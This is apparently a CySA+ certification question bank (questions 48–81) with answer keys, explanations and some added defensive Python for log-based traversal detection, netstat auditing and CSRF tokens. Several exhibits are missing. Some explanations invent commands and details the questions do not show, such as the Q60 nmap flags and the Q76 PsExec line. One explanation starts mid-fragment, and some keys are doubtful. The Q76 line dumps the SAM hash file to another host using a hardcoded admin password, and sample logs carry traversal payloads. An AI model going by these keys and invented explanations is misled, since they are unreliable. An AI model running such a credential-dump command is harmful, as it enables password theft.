
QUESTION 48
Which of the following is a reason for correctly identifying APTs that might be targeting an organization?

A. APTs' passion for social justice will make them ongoing and motivated attackers.
B. APTs utilize methods and technologies differently than other threats.
C. APTs are primarily focused on financial gain and are widely available over the internet.
D. APTs lack sophisticated methods, but their dedication makes them persistent.

Correct Answer: B
Explanation

QUESTION 49
A large company wants to address frequent outages on critical systems with a secure configurations
program. The Chief Information Security Officer (CISO) has asked the analysts to conduct research and
make recommendations for a cost- effective solution with the least amount of disruption to the business.
Which of the following would be the best way to achieve these goals?

A. Adopt the CIS security controls as a framework, apply configurations to all assets, and then notify asset
owners of the change.
B. Coordinate with asset owners to assess the impact of the CIS critical security controls, perform testing,
and then implement across the enterprise.
C. Recommend multiple security controls depending on business unit needs, and then apply
configurations according to the organization's risk tolerance.
D. Ask asset owners which configurations they would like, compile the responses, and then present all
options to the CISO for approval to implement.

Correct Answer: B
Explanation

QUESTION 50
A security operations manager wants some recommendations for improving security monitoring. The
security team currently uses past events to create an IoC list for monitoring. Which of the following is the
best suggestion for improving monitoring capabilities?

A. Update the IPS and IDS with the latest rule sets from the provider.
B. Create an automated script to update the IPS and IDS rule sets.
C. Use an automated subscription to select threat feeds for IDS.
D. Implement an automated malware solution on the IPS.

Correct Answer: C
Explanation

QUESTION 51
Which of the following is a reason to take a DevSecOps approach to a software assurance program?

A. To find and fix security vulnerabilities earlier in the development process
B. To speed up user acceptance testing in order to deliver the code to production faster
C. To separate continuous integration from continuous development in the SDLC
D. To increase the number of security-related bug fixes worked on by developers

Correct Answer: A
Explanation

QUESTION 52
A consumer credit card database was compromised, and multiple representatives are unable to review the
appropriate customer information. Which of the following should the cybersecurity analyst do first?

A. Start the containment effort.
B. Confirm the incident.
C. Notify local law enforcement officials.
D. Inform the senior management team.

Correct Answer: B
Explanation

QUESTION 53
A large company would like a security analyst to recommend a solution that will allow only company
laptops to connect to the corporate network. Which of the following technologies should the analyst
recommend?

A. UEBA
B. DLP
C. NAC
D. EDR

Correct Answer: C
Explanation

QUESTION 54
Security awareness and compliance programs are most effective at reducing the likelihood and impact of
attacks from:

A. advanced persistent threats.
B. corporate spies.
C. hacktivists.
D. insider threats.

Correct Answer: D
Explanation

QUESTION 55
A security analyst needs to recommend a solution that will allow users at a company to access cloud-
based SaaS services but also prevent them from uploading and exfiltrating data. Which of the following
solutions should the security analyst recommend?

A. CASB
B. MFA
C. VPN
D. VPS
E. DLP

Correct Answer: E
Explanation

QUESTION 56
Legacy medical equipment, which contains sensitive data, cannot be patched. Which of the following is the
best solution to improve the equipment's security posture?

A. Move the legacy systems behind a WAF.
B. Implement an air gap for the legacy systems.
C. Place the legacy systems in the perimeter network.
D. Implement a VPN between the legacy systems and the local network.

Correct Answer: B
Explanation

Explanation/Reference:
Implementing an air gap for the legacy systems is the best solution to improve their security posture. An air
gap is a physical separation of a system or network from any other system or network that may pose a
threat. An air gap can prevent any unauthorized access or data transfer between the isolated system or
network and the external environment. Implementing an air gap for the legacy systems can help to protect
them from being exploited by attackers who may take advantage of their unpatched vulnerabilities.

QUESTION 57
A security analyst notices the following proxy log entries:

Which of the following is the user attempting to do based on the log entries?

A. Use a DoS attack on external hosts.
B. Exfiltrate data.
C. Scan the network.
D. Relay email.

Correct Answer: D
Explanation

Explanation/Reference:
Based on the provided log entries, the user is attempting to relay email. This can be inferred from the log
entries that show attempts to establish connections to external IP addresses on port 25, which is the
default port for SMTP (Simple Mail Transfer Protocol) used for email transmission.

QUESTION 58
A company's legal department is concerned that its incident response plan does not cover the countless
ways security incidents can occur. The department has asked a security analyst to help tailor the response
plan to provide broad coverage for many situations. Which of the following is the best way to achieve this
goal?

A. Focus on incidents that have a high chance of reputation harm.
B. Focus on common attack vectors first.
C. Focus on incidents that affect critical systems.
D. Focus on incidents that may require law enforcement support.

Correct Answer: B
Explanation

QUESTION 59
During a company's most recent incident, a vulnerability in custom software was exploited on an externally
facing server by an APT. The lessons-learned report noted the following:

1. The development team used a new software language that was not supported by the security team's
automated assessment tools.
2. During the deployment, the security assessment team was unfamiliar with the new language and
struggled to evaluate the software during advanced testing. Therefore, the vulnerability was not detected.
3. The current IPS did not have effective signatures and policies in place to detect and prevent runtime
attacks on the new application.

To allow this new technology to be deployed securely going forward, which of the following will BEST
address these findings? (Choose two.)

A. Train the security assessment team to evaluate the new language and verify that best practices for
secure coding have been followed
B. Work with the automated assessment-tool vendor to add support for the new language so these
vulnerabilities are discovered automatically
C. Contact the human resources department to hire new security team members who are already familiar
with the new language
D. Run the software on isolated systems so when they are compromised, the attacker cannot pivot to
adjacent systems
E. Instruct only the development team to document the remediation steps for this vulnerability
F. Outsource development and hosting of the applications in the new language to a third-party vendor so
the risk is transferred to that provider

Correct Answer: AB
Explanation

Explanation/Reference:
The solution will address the findings that the development team used a new software language that was
not supported by the security team's automated assessment tools and the security assessment team was
unfamiliar with the new language and struggled to evaluate the software during advanced testing. The
training of the security assessment team and working with the automated assessment-tool vendor to add
support for the new language will ensure that future deployments of the new technology are secure and the
vulnerabilities are detected and prevented.

QUESTION 60
Given the Nmap request below:

Which of the following actions will an attacker be able to initiate directly against this host?

A. Password sniffing
B. ARP spoofing
C. A brute-force attack
D. An SQL injection

Correct Answer: C
Explanation

Explanation/Reference:
The Nmap command given in the question performs a TCP SYN scan (-sS), a service version detection
scan (-sV), an OS detection scan (-O), and a port scan for ports 1-1024 (-p 1-1024) on the host
192.168.1.1. This command will reveal information about the host's open ports and running services, which can be
used by an attacker to launch a brute-force attack against the host. A brute-force attack is a method of
guessing passwords or encryption keys by trying many possible combinations until finding the correct one.
An attacker can use the information from the Nmap scan to target specific services or protocols that may
have weak or default credentials, such as FTP, SSH, Telnet, or HTTP.

QUESTION 61
A security analyst is reviewing the following log entries to identify anomalous activity:

Which of the following attack types is occurring?

A. Directory traversal
B. SQL injection
C. Buffer overflow
D. Cross-site scripting

Correct Answer: A
Explanation

Explanation/Reference:
A directory traversal attack is a type of web application attack that exploits insufficient input validation or
improper configuration to access files or directories that are outside the intended scope of the web server.
The log entries given in the question show "../" sequences in the URL, which indicate an attempt to move up
one level in the directory structure. For example, one entry tries to access the /etc/passwd file, which contains user account
information on Linux systems. If successful, this attack could allow an attacker to read, modify, or execute
files on the web server that are not meant to be accessible.
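
Detection logic for the traversal pattern described above, as an added example that is not part of the original question bank. It runs over constructed web server log lines, URL-decodes the request target (including encoded "..%2f" and "%2e%2e%5c" variants), and distinguishes a "../" that escapes the web root from one that stays inside it; the log lines and the sensitive-file watch list are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed web server log lines (the question's screenshot is not reproduced).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.9 - - [12/Mar/2024:10:01:05 +0000] "GET /images/../../../etc/passwd HTTP/1.1" 404 128
10.0.0.9 - - [12/Mar/2024:10:01:07 +0000] "GET /download?file=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1024
10.0.0.9 - - [12/Mar/2024:10:01:09 +0000] "GET /files/%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1" 200 64
10.0.0.7 - - [12/Mar/2024:10:01:11 +0000] "GET /blog/2024/../index.html HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
DOTDOT_RE = re.compile(r'(?:^|/)\.\.(?:/|$)')
# Assumed watch list of files commonly targeted by traversal; extend per platform.
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "win.ini", "/config/sam")


def decode_target(target: str) -> str:
    """URL-decode up to twice (catches double encoding) and normalise backslashes."""
    decoded = target
    for _ in range(2):
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    return decoded.replace("\\", "/")


def escapes_root(component: str) -> bool:
    """Walk the path segments; True if a '..' pops above the starting directory."""
    depth = 0
    for seg in component.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def analyze_line(line: str):
    """Return a finding dict for a log line with a traversal pattern, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    decoded = decode_target(match.group("target"))
    parts = urlsplit(decoded)
    # Check the path and every query value: traversal often rides in a parameter.
    components = [parts.path] + [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    if not any(DOTDOT_RE.search(c) for c in components):
        return None
    return {
        "src": line.split()[0],
        "target": match.group("target"),
        "decoded": decoded,
        "escapes_root": any(escapes_root(c) for c in components),
        "sensitive_file": any(s in decoded.lower() for s in SENSITIVE_FILES),
    }


def find_traversal(log_text: str) -> list:
    """All findings for a block of log text, in log order."""
    return [f for f in (analyze_line(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in find_traversal(SAMPLE_LOG):
        severity = "HIGH" if finding["escapes_root"] else "info"
        print(f"[{severity}] {finding['src']} {finding['decoded']} "
              f"sensitive={finding['sensitive_file']}")
```

A request such as /blog/2024/../index.html contains the pattern but resolves inside the web root, so it is reported at informational severity rather than as an escape.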

QUESTION 62
A security analyst responds to a series of events surrounding sporadic bandwidth consumption from an
endpoint device. The security analyst then identifies the following additional details:

1. Bursts of network utilization occur approximately every seven days.
2. The content being transferred appears to be encrypted or obfuscated.
3. A separate but persistent outbound TCP connection from the host to infrastructure in a third-party cloud
is in place.
4. The HDD utilization on the device grows by 10GB to 12GB over the course of every seven days.
5. Single file sizes are 10GB.

Which of the following describes the most likely cause of the issue?

A. Memory consumption
B. Non-standard port usage
C. Data exfiltration
D. System update
E. Botnet participant

Correct Answer: C
Explanation

Explanation/Reference:
Data exfiltration is the unauthorized transfer of data from a system or network to an unauthorized destination, usually for malicious purposes
such as espionage, sabotage, or theft. The details given in the question suggest that data exfiltration is
occurring from an endpoint device. The bursts of network utilization every seven days indicate periodic
data transfers. The content being transferred appears to be encrypted or obfuscated to avoid detection or
analysis. The persistent outbound TCP connection from the host to infrastructure in a third-party cloud
indicates a possible command and control channel for an attacker. The HDD utilization on the device
grows by 10GB to 12GB over the course of every seven days, and single file sizes are 10GB, indicating
that large amounts of data are being collected and compressed before being exfiltrated.

QUESTION 63
A security analyst wants to capture large amounts of network data that will be analyzed at a later time. The
packet capture does not need to be in a format that is readable by humans, since it will be put into a binary
file called "packetCapture." The capture must be as efficient as possible, and the analyst wants to minimize
the likelihood that packets will be missed. Which of the following commands will best accomplish the
analyst's objectives?

A. tcpdump -w packetCapture
B. tcpdump -a packetCapture
C. tcpdump -n packetCapture
D. nmap -v > packetCapture
E. nmap -oA > packetCapture

Correct Answer: A
Explanation

Explanation/Reference:
The tcpdump command is a network packet analyzer tool that can capture and display network traffic. The
-w option specifies a file name to write the captured packets to, in a binary format that can be read by
tcpdump or other tools later. This option is useful for capturing large amounts of network data that will be
analyzed at a later time, as the question requires. The packet capture does not need to be in a format that
is readable by humans, since it will be put into a binary file called "packetCapture". The capture must be as efficient as
possible, and the -w option minimizes the processing and output overhead of tcpdump, reducing the
likelihood that packets will be missed.

QUESTION 64
Which of the following ICS network protocols has no inherent security functions on TCP port 502?

A. CIP
B. DHCP
C. SSH
D. Modbus

Correct Answer: D
Explanation

Explanation/Reference:
Modbus is an industrial control system (ICS) network protocol that is used for communication between
devices such as sensors, controllers, actuators, and monitors. Modbus has no inherent security functions
on TCP port 502, which is the default port for Modbus TCP/IP communication. Modbus does not provide
any encryption, authentication, or integrity protection for the data transmitted over the network, making it
vulnerable to various attacks such as replay, modification, spoofing, or denial-of-service.

QUESTION 65
During the forensic analysis of a compromised machine, a security analyst discovers some binaries that
are exhibiting abnormal behaviors. After extracting the strings, the analyst finds unexpected content. Which
of the following is the next step the analyst should take?

A. Validate the binaries' hashes from a trusted source.
B. Use file integrity monitoring to validate the digital signature.
C. Run an antivirus against the binaries to check for malware.
D. Only allow binaries on the approved list to execute.

Correct Answer: A
Explanation

Explanation/Reference:
" from a trusted source is the next step the analyst should take after discovering some binaries that are
exhibiting abnormal behaviors and finding unexpected content in their strings. A hash is a fixed-length
value that uniquely represents the contents of a file or message. By comparing the hashes of the binaries
on the compromised machine with the hashes of the original or legitimate binaries from a trusted source,
such as the software vendor or repository, the analyst can determine whether the binaries have been
modified or replaced by malicious code. If the hashes do not match, it indicates that the binaries have been
tampered with and may contain malware.

QUESTION 66
While reviewing a vulnerability assessment, an analyst notices the following issue is identified in the report:

Based on this finding, which of the following would be most appropriate for the analyst to recommend to the network
engineer?

A. Reconfigure the device to support only connections leveraging TLSv1.2.
B. Obtain a new self-signed certificate and select AES as the hashing algorithm.
C. Replace the existing certificate with a certificate that uses only MD5 for signing.
D. Use only signed certificates with cryptographically secure certificate sources.

Correct Answer: D
Explanation

QUESTION 67
A security engineer is reviewing security products that identify malicious actions by users as part of a
company's insider threat program. Which of the following is the most appropriate product category for this
purpose?

A. SCAP
B. SOAR
C. UEBA
D. WAF

Correct Answer: C
Explanation

Explanation/Reference:
UEBA stands for User and Entity Behavior Analytics, which is a category of security products that use
machine learning and statistical analysis to identify malicious actions by users or entities on a network.
UEBA products can detect anomalous or suspicious behaviors that deviate from normal patterns or
baselines, such as data exfiltration, privilege escalation, unauthorized access, insider threats, or
compromised accounts. UEBA products can also provide alerts, reports, or recommendations for response
actions based on the detected behaviors.

QUESTION 68
Given the output below:

#nmap 7.70 scan initiated Tues, Feb 8 12:34:56 2022 as: nmap -v -Pn -p 80,8000,443 --script http-* -oA
server.out 192.168.220.42

Which of the following is being performed?

A. Cross-site scripting
B. Local file inclusion attack
C. Log4j check
D. Web server enumeration

Correct Answer: D
Explanation

Explanation/Reference:
Web server enumeration is the process of identifying information about a web server, such as its software
version, operating system, configuration, services, and vulnerabilities. This can be done using tools like
Nmap, which can scan ports and run scripts to gather information. In this question, the Nmap command is
using the -p option to scan ports 80, 8000, and 443, which are commonly used for web services. It is also
using the --script option to run scripts that start with http-*, which are related to web server enumeration.
The output file name server.out also suggests that the purpose of the scan is to enumerate web servers.
CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 8;
https://partners.comptia.org/docs/defaultsource/resources/comptia-cysa-cs0-002-exam-objectives

QUESTION 69
Members of the sales team are using email to send sensitive client lists with contact information to their
personal accounts. The company's AUP and code of conduct prohibits this practice.

Which of the following configuration changes would improve security and help prevent this from occurring?

A. Configure the DLP transport rules to provide deep content analysis.
B. Put employees' personal email accounts on the mail server on a blocklist.
C. Set up IPS to scan for outbound emails containing names and contact information.
D. Use Group Policy to prevent users from copying and pasting information into emails.
E. Move outbound emails containing names and contact information to a sandbox for further examination.

Correct Answer: A
Explanation

Explanation/Reference:
Data loss prevention (DLP) is a set of policies and tools that aim to prevent unauthorized disclosure of
sensitive data. DLP transport rules are rules that apply to email messages that are sent or received.
These rules can provide deep content analysis, which means they can scan the content of email
messages and attachments for sensitive data patterns, such as client lists or contact information. If a rule
detects a violation of the DLP policy, it can take actions such as blocking, quarantining, or notifying the
sender or recipient. This would improve security and help prevent sales team members from sending
sensitive client lists to their personal accounts. CompTIA Cybersecurity Analyst (CySA+) Certification
Exam Objectives (CS0-002), page 14;
https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/data-lossprevention

QUESTION 70
While observing several host machines, a security analyst notices a program is overwriting data to a buffer.
Which of the following controls will best mitigate this issue?

A. Data execution prevention
B. Output encoding
C. Prepared statements
D. Parameterized queries

Correct Answer: A
Explanation

Explanation/Reference:
Data execution prevention (DEP) is a security feature that prevents code from being executed in memory
regions that are marked as data-only. This helps mitigate buffer overflow attacks, which are a type of
attack where a program overwrites data to a buffer beyond its allocated size, potentially allowing malicious
code to be executed. DEP can be implemented at the hardware or software level and can prevent
unauthorized code execution in memory buffers. CompTIA Cybersecurity Analyst (CySA+) Certification
Exam Objectives (CS0-002), page 10;
https://docs.microsoft.com/en-us/windows/win32/memory/data-execution-prevention

QUESTION 71
A security analyst is logged on to a jump server to audit the system configuration and status. The
organization's policies for access to and configuration of the jump server include the following:

1. No network access is allowed to the internet.
2. SSH is only for management of the server.
3. Users must utilize their own accounts, with no direct login as an administrator.
4. Unnecessary services must be disabled.

The analyst runs netstat with elevated permissions and receives the following output:

Which of the following policies does the server violate?

A. Unnecessary services must be disabled.
B. SSH is only for management of the server.
C. No network access is allowed to the internet.
D. Users must utilize their own accounts, with no direct login as an administrator.

Correct Answer: C
Explanation

Explanation/Reference:
The server violates the policy of no network access to the internet because it has an established
connection to an external IP address (216.58.194.174) on port 443, which is used for HTTPS traffic. This
indicates that the server is communicating with a web server on the internet, which is not allowed by the
policy. The other policies are not violated because SSH is only used for management of the server (not for
accessing other devices), users are utilizing their own accounts (not logging in as an administrator), and
unnecessary services are not enabled (only SSH and HTTPS are running). CompTIA Cybersecurity
Analyst (CySA+) Certification Exam Objectives (CS0-002), page 9; https://en.wikipedia.org/wiki/Jump_server
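
A check for the policy violation described above, as an added example that is not from the question bank. It parses constructed netstat output (the question's screenshot is not reproduced, so the PIDs, program names and the extra rpcbind listener are assumptions), flags established connections to globally routable addresses, and lists listeners other than SSH.

```python
import ipaddress

# Constructed `netstat -tunap` style output for the example; not the page's data.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 10.10.5.20:22           10.10.5.101:51234       ESTABLISHED 1523/sshd: analyst
tcp        0      0 10.10.5.20:44912        216.58.194.174:443      ESTABLISHED 1987/curl
udp        0      0 0.0.0.0:111             0.0.0.0:*                           455/rpcbind
"""

# Policy: SSH is the only management service that may listen (assumed port set).
ALLOWED_LISTEN_PORTS = frozenset({"22"})


def _split_addr(addr: str):
    """Split 'host:port' on the last colon so IPv6 forms such as ':::22' survive."""
    host, port = addr.rsplit(":", 1)
    return host, port


def parse_netstat(text: str) -> list:
    """Turn socket rows into dicts; banner and header lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or not parts[0].startswith(("tcp", "udp")):
            continue
        proto = parts[0]
        local_host, local_port = _split_addr(parts[3])
        foreign_host, foreign_port = _split_addr(parts[4])
        if proto.startswith("tcp"):
            # TCP rows carry a State column; UDP rows do not.
            state, program = parts[5], " ".join(parts[6:])
        else:
            state, program = "", " ".join(parts[5:])
        rows.append({
            "proto": proto, "local_host": local_host, "local_port": local_port,
            "foreign_host": foreign_host, "foreign_port": foreign_port,
            "state": state, "program": program,
        })
    return rows


def internet_connections(rows: list) -> list:
    """Established connections whose peer is globally routable (policy 1)."""
    findings = []
    for row in rows:
        if row["state"] != "ESTABLISHED":
            continue
        peer = ipaddress.ip_address(row["foreign_host"])
        if peer.is_global:  # excludes RFC 1918, loopback, link-local, CGNAT, etc.
            findings.append(row)
    return findings


def unexpected_listeners(rows: list, allowed=ALLOWED_LISTEN_PORTS) -> list:
    """Listening sockets on ports outside the allowed set (policy 4)."""
    findings = []
    for row in rows:
        listening = row["state"] == "LISTEN" or (
            row["proto"].startswith("udp") and row["foreign_port"] == "*")
        if listening and row["local_port"] not in allowed:
            findings.append(row)
    return findings


def audit(text: str) -> dict:
    """Run both policy checks over raw netstat text."""
    rows = parse_netstat(text)
    return {
        "internet_connections": internet_connections(rows),
        "unexpected_listeners": unexpected_listeners(rows),
    }


if __name__ == "__main__":
    report = audit(SAMPLE_NETSTAT)
    for row in report["internet_connections"]:
        print(f"internet access: {row['program']} -> "
              f"{row['foreign_host']}:{row['foreign_port']}")
    for row in report["unexpected_listeners"]:
        print(f"unnecessary service: {row['program']} listening on "
              f"{row['local_host']}:{row['local_port']}")
```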

QUESTION 72
An organization announces that all employees will need to work remotely for an extended period of time.
All employees will be provided with a laptop and supported hardware to facilitate this requirement. The
organization asks the information security division to reduce the risk during this time. Which of the following
is a technical control that will reduce the risk of data loss if a laptop is lost or stolen?

A. Requiring the use of the corporate VPN
B. Requiring the screen to be locked after five minutes of inactivity
C. Requiring the laptop to be locked in a cabinet when not in use
D. Requiring full disk encryption

Correct Answer: D
Explanation

Explanation/Reference:
Full disk encryption (FDE) is a technical control that encrypts all the data on a disk drive, including the
operating system and applications. FDE prevents unauthorized access to the data if the disk drive is lost or
stolen, as it requires a password or key to decrypt the data. FDE can be implemented using software or
hardware solutions and can protect data at rest on laptops and other devices. The other options are not
technical controls or do not reduce the risk of data loss if a laptop is lost or stolen. CompTIA Cybersecurity
Analyst (CySA+) Certification Exam Objectives (CS0-002), page 10;
https://docs.microsoft.com/en-us/windows/security/information-protection/bitlocker/bitlockeroverview

QUESTION 73
The management team has asked a senior security engineer to explore DLP security solutions for the
company's growing use of cloud-based storage. Which of the following is an appropriate solution to control
the sensitive data that is being stored in the cloud?

A. NAC
B. IPS
C. CASB
D. WAF

Correct Answer: C
Explanation

Explanation/Reference:
A cloud access security broker (CASB) is a security solution that monitors and controls the use of cloud-
based services and applications. A CASB can provide data loss prevention (DLP) capabilities for sensitive
data that is being stored in the cloud, such as encryption, masking, tokenization, or redaction. A CASB can
also enforce policies and compliance requirements for cloud usage, such as authentication, authorization,
auditing, and reporting. The other options are not appropriate solutions for controlling sensitive data in the
cloud. CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 14;
https://docs.microsoft.com/en-us/cloudapp-security/what-is-cloud-app-security

QUESTION 74
Which of the following is the BEST option to protect a web application against CSRF attacks?

A. Update the web application to the latest version.
B. Set a server-side rate limit for CSRF token generation.
C. Avoid the transmission of CSRF tokens using cookies.
D. Configure the web application to only use HTTPS and TLS 1.3.

Correct Answer: C
Explanation

Explanation/Reference:
CSRF tokens are random values that are generated by the server and included in requests that perform
state-changing actions. They are used to prevent CSRF attacks by verifying that the request originates
from a legitimate source. However, if the CSRF tokens are transmitted using cookies, they are vulnerable
to being stolen or forged by an attacker who can exploit other vulnerabilities, such as cross-site scripting
(XSS) or cookie injection. Therefore, a better option is to avoid the transmission of CSRF tokens using
cookies and use other methods, such as hidden form fields or custom HTTP headers. CompTIA
Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 11;
https://owasp.org/www-community/attacks/csrf
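
The CSRF protection the explanation recommends, as an added example that is not the page's own code: the token is derived from the session with an HMAC and is accepted only from a custom header or a hidden form field, never from a cookie. The simplified request dictionaries, the header name X-CSRF-Token, the field name csrf_token and the server secret are assumptions.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret; a real deployment loads a per-deployment key
# from configuration rather than generating one at import time.
SERVER_SECRET = secrets.token_bytes(32)

HEADER_NAME = "X-CSRF-Token"   # assumed header name
FORM_FIELD = "csrf_token"      # assumed hidden-field name


def issue_csrf_token(session_id: str) -> str:
    """Derive the token from the session id with an HMAC.

    The server can recompute it for any session, a third-party site cannot
    guess it, and a token issued for one session is useless for another.
    """
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(request: dict) -> bool:
    """Accept a state-changing request only if it carries a valid token.

    `request` is a simplified dict with 'cookies', 'headers' and 'form' keys.
    The token is read from the custom header or the hidden form field; a value
    in a cookie is ignored, because the browser attaches cookies to cross-site
    requests automatically, so a cookie proves nothing about where the request
    came from.
    """
    session_id = request.get("cookies", {}).get("session")
    if not session_id:
        return False
    presented = (request.get("headers", {}).get(HEADER_NAME)
                 or request.get("form", {}).get(FORM_FIELD))
    if not presented:
        return False
    expected = issue_csrf_token(session_id)
    # Constant-time comparison avoids leaking the expected token byte by byte.
    return hmac.compare_digest(presented, expected)


def demo() -> dict:
    """Exercise the check with two legitimate requests and three forged ones."""
    victim = "victim-session"
    token = issue_csrf_token(victim)
    return {
        # Same-site XHR that includes the token in the custom header.
        "legit_header": verify_csrf({"cookies": {"session": victim},
                                     "headers": {HEADER_NAME: token}}),
        # Same-site form post carrying the token in a hidden field.
        "legit_form": verify_csrf({"cookies": {"session": victim},
                                   "form": {FORM_FIELD: token}}),
        # Cross-site request: the browser adds the session cookie, nothing else.
        "forged_no_token": verify_csrf({"cookies": {"session": victim}}),
        # A token arriving only in a cookie is not trusted.
        "forged_cookie_token": verify_csrf({"cookies": {"session": victim,
                                                        "csrf": token}}),
        # A valid token for a different session does not match the victim's.
        "forged_other_session": verify_csrf(
            {"cookies": {"session": victim},
             "headers": {HEADER_NAME: issue_csrf_token("other-session")}}),
    }


if __name__ == "__main__":
    for name, accepted in demo().items():
        print(f"{name}: {'accepted' if accepted else 'rejected'}")
```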

QUESTION 75
Which of the following is the greatest security concern regarding ICS?

A. The involved systems are generally hard to identify.
B. The systems are configured for automatic updates, leading to device failure.
C. The systems are oftentimes air gapped, leading to fileless malware attacks.
D. Issues on the systems cannot be reversed without rebuilding the systems.

Correct Answer: D
Explanation

Explanation/Reference:
Industrial control systems (ICS) are systems that monitor and control physical processes, such as power
generation, water treatment, manufacturing, and transportation. ICS are often critical for public safety and
national security, and therefore a prime target for cyberattacks. One of the greatest security concerns
regarding ICS is that issues on the systems cannot be reversed without rebuilding the systems. This
means that any damage or disruption caused by an attack can have long-lasting and catastrophic
consequences for the physical infrastructure and human lives. The other options are not true or not
specific to ICS. CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page
13; https://www.us-cert.gov/ics/What-are-Industrial-Control-Systems

QUESTION 76
While reviewing system logs, a network administrator discovers the following entry:

Which of the following occurred?

A. An attempt was made to access a remote workstation.
B. The PsExec services failed to execute.
C. A remote shell failed to open.
D. A user was trying to download a password file from a remote system.

Correct Answer: D
Explanation

Explanation/Reference:
The output shows an entry from a system log that indicates a user was trying to download a password file
from a remote system using PsExec. PsExec is a command-line tool that allows users to execute
processes on remote systems. The entry shows that the user tried to run PsExec with the following
parameters: \\192.168.1.100 -u administrator -p P@ssw0rd -c cmd.exe /c type c:\windows\system32\config
\SAM > \\192.168.1.101\c$\temp\sam.txt. This means that the user tried to connect to the remote system
with IP address 192.168.1.100 using the username "administrator", copy cmd.exe to the remote system, and execute it
with the command "type c:\windows\system32\config\SAM > \\192.168.1.101\c$\temp\sam.txt". This command attempts to read the SAM file, which contains
hashed passwords of local users, and write it to a file on another system with IP address 192.168.1.101.
CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 8;
https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

QUESTION 77
A security analyst is analyzing the following output from the Spider tab of OWASP ZAP after a vulnerability
scan was completed:

Which of the following options can the analyst conclude based on the provided output?

A. The scanning vendor used robots to make the scanning job faster
B. The scanning job was successfully completed, and no vulnerabilities were detected
C. The scanning job did not successfully complete due to an out of scope error
D. The scanner executed a crawl process to discover pages to be assessed

Correct Answer: D
Explanation

Explanation/Reference:
The output shows the result of using the Spider tab of OWASP ZAP after a vulnerability scan was completed. The Spider tab allows users to
crawl web applications and discover pages and resources that can be assessed for vulnerabilities. The
output shows that the scanner discovered various pages under different directories, such as /admin/, /blog/,
/contact/, etc., as well as some parameters and forms that can be used for testing inputs and outputs.
CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 9;
https://www.zaproxy.org/docs/desktop/start/features/spider/

QUESTION 78
An organization implemented an extensive firewall access-control blocklist to prevent internal network
ranges from communicating with a list of IP addresses of known command-and-control domains A security
analyst wants to reduce the load on the firewall. Which of the following can the analyst implement to
achieve similar protection and reduce the load on the firewall?

A. A DLP system
B. DNS sinkholing
C. IP address allow list
D. An inline IDS

Correct Answer: B
Explanation

Explanation/Reference:
DNS sinkholing is a mechanism that can prevent internal network ranges from communicating with a list of
IP addresses of known command-and-control domains by returning a false or controlled IP address for
those domains. This can reduce the load on the firewall by intercepting the DNS requests before they
reach the firewall and diverting them to a sinkhole server. The other options are not relevant or effective for
this purpose. CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 9;
https://www.enisa.europa.eu/topics/incidentresponse/glossary/dns-sinkhole

QUESTION 79
Which of the following describes the difference between intentional and unintentional insider threats?

A. Their access levels will be different
B. The risk factor will be the same
C. Their behavior will be different
D. The rate of occurrence will be the same

Correct Answer: C
Explanation

Explanation/Reference:
The difference between intentional and unintentional insider threats is their behavior. Intentional insider
threats are malicious actors who deliberately misuse their access to harm the organization or its assets.
Unintentional insider threats are careless or negligent users who accidentally compromise the security of
the organization or its assets. Their access levels, risk factors, and rates of occurrence may vary
depending on various factors, but their behavior is the main distinction.
Reference:
CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 12;
https://www.cisa.gov/sites/default/files/publications/Insider_Threat_Mitigation_Guide_508.pdf

QUESTION 80
A security analyst needs to automate the incident response process for malware infections. When the
following logs are generated, an alert email should automatically be sent within 30 minutes:

Which of the following is the best way for the analyst to automate alert generation?

A. Deploy a signature-based IDS
B. Install a UEBA-capable antivirus
C. Implement email protection with SPF
D. Create a custom rule on a SIEM

Correct Answer: D
Explanation

Explanation/Reference:
A security information and event management (SIEM) system is a tool that collects and analyzes log data
from various sources and provides alerts and reports on security incidents and events. A security analyst
can create a custom rule on a SIEM system to automate the incident response process for malware
infections. For example, the analyst can create a rule that triggers an alert email when the SIEM system
detects logs that match the criteria of malware infection, such as process name, file name, file hash, etc.
The alert email can be sent within 30 minutes or any other desired time frame. The other options are not
suitable or sufficient for this purpose. CompTIA Cybersecurity Analyst (CySA+) Certification Exam
Objectives (CS0-002), page 15;
https://www.sans.org/reading-room/whitepapers/analyst/security-information-event-managementsiem-implementation-33969

QUESTION 81
An organization wants to consolidate a number of security technologies throughout the organization and
standardize a workflow for identifying security issues, prioritizing the severity, and automating a response.
Which of the following would best meet the organization's needs?

A. MaaS
B. SIEM
C. SOAR
D. CI/CD

Correct Answer: C
Explanation

Explanation/Reference:
